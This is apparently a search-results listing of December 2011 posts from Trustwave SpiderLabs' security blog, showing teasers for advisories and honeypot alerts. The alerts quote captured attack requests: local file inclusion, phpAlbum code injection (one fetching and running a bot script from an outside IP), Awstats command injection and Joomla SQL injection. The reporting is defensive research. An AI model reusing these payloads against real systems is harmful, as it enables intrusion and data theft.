Showing 12 results for: December 2011 ×Security Research ×

TWSL2011-019: Cross-Site Scripting Vulnerability in phpMyAdmin

The Spiderlabs team at Trustwave published a new advisory for a Cross-Side-Scripting (XSS) found in phpMyAdmin 3.4.8 and previous versions. phpMyAdmin is an open source tool developed in PHP to manage and administer MySQL databases remotely. The vulnerability was discovered...

[Honeypot Alert] User Agent Field Arbitrary PHP Code Execution

While reviewing today's web honeypot logs, SpiderLabs Research identified two new attack variations. Focus on Local File Inclusion attacks Here are some of the LFI attack payloads identified today: GET /_functions.php?prefix=../../../../../../../proc/self/environ%00 HTTP/1.1 GET /ashnews.php?pathtoashnews=../../../../../../../proc/self/environ%00 HTTP/1.1 GET /b2-tools/gm-2-b2.php?b2inc=../../../../../../../proc/self/environ%00 HTTP/1.1 GET /catalog/shopping_cart.php?_ID=../../../../../../../proc/self/environ%00...

[Honeypot Alert] phpAlbum PHP Code Execution Attacks

We have seen a number of scans probing for phpAlbum code execution vulns in our web honeypot logs: GET /admin/main.php?cmd=setquality&var1=1%27.system%28%27echo%200wn3d.Nu%27%29.%27; HTTP/1.1 GET /admin/main.php?cmd=setquality&var1=1%27.system%28%27wget%20http://72.41.115.123/.mods/pbot.txt%20-O%20pb.php;%20php%20pb.php;%20wget%20http://72.41.115.123/.mods/sh.txt%20-O%20h4rd.php%27%29.%27; HTTP/1.1 GET /album/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1 GET /albums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1 GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0 GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0 GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1 GET...

Mobile Device Location Tracking, and Why It Matters

Throughout the past decade, there has been a substantial increase in mobile device usage. From smartphones to tablets, most individuals possess at least one. More and more people now have ready access to a substantial amount of data through mobile...

[Honeypot Alert] Awstats Command Injection Scanning Detected

Issue Detected Our daily web honeypot analysis has detected an increase in scanning looking for command injection flaws in the Awstats package. Here are example attacks from the logs: GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0 GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1 GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0 GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d...

Microsoft Patch Tuesday, December 2011

This Patch Tuesday, there are 3 new Critical and 10 new Important Bulletins. With this many high-urgency bulletins, it's tough to get a handle on which ones to tackle first. Of course, "all of them" is the standard answer, but...

[Honeypot Alert] WordPress/Joomla/Mambo SQL Injection Scanning Detected

Our web honeypot analysis today detected scanning looking for SQL Injection flaws in a number of Wordpress/Joomla/Mambo components. GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1 GET /index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET /index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET /index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&filter=&city_id=&function_id=&limit=5&pageno=1&job_id=-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fall%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET /index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET /index.php?option=com_rsgallery&page=inline&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C4%2C0x33633273366962%2C6%2C7%2C8%2C9%2C10%2C11%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos__users-- HTTP/1.1 GET /index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=61&cat_id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C0x33633273366962%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C1%2C2%2C2%2C2%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET...